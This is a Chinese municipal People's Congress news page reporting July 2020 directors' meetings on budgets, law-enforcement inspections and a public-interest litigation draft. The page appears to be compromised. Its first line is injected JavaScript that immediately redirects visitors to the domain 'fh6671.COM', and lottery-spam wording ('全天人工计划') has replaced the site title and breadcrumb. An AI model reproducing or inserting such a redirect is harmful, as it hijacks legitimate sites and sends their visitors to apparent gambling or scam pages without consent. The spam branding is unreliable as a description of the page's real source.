function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新工作动态  >>  会议专栏  >>  主任会议  
市十届人大常委会第48次主任会议召开
来源: 市人大常委会研究室      日期: 2020-07-16      作者: 张媛      点击数:

市十届人大常委会第48次主任会议召开

       7月10日,市十届人大常委会第48次主任会议召开。市人大常委会党组书记、主任王进平主持会议。市人大常委会副主任王万平、韩峻峰、荔瑾,市人大常委会秘书长赵大鹏出席会议。

      会议审议了市十届人大六次会议通过的“一府两院”工作报告落实情况的审议意见,关于对市民政局、市生态环境局开展工作评议的实施方案;审议了《嘉峪关市人民代表大会常务委员会关于加强公益诉讼工作的决定(草案)》,听取了民侨内务司法工作委员会关于《决定(草案)》起草情况说明;听取和审议了市人大常委会执法检查组关于野生动物保护“两法两决定”、《传染病防治法》的执法检查报告;听取了市人大常委会调研组《关于全面建成小康社会指标短板调研报告》;

       会议还讨论了人事任免相关事宜,议定了第二十七、二十八次常委会会议议题。

       市人大各专委会、市人大常委会各部门负责人列席了会议。

       7月16日,市十届人大常委会第48次主任会议第二次会议召开。市人大常委会党组书记、主任王进平主持会议。市人大常委会副主任王万平、唐晓东、韩峻峰、荔瑾,市人大常委会秘书长赵大鹏出席会议。

       会议听取了市政府《关于嘉峪关市2020年上半年国民经济和社会发展计划执行情况的报告》《关于2019年市级财政决算草案和2020年上半年市级财政预算执行情况的报告》;审议了市人大财经委员会《关于2019年市级财政总决算草案和2020年上半年财政预算执行情况的审查结果的报告》,市人大常委会财经预算工作委员会《关于嘉峪关市2020年上半年国民经济和社会发展计划执行情况的调研报告》,《嘉峪关市第十届人民代表大会常务委员会关于批准嘉峪关市2019年财政总决算决议(草案)》。

       市人大常委会办公室、研究室负责人,市人大财经委员会、市人大常委会财经预算工作委员会负责人列席了会议。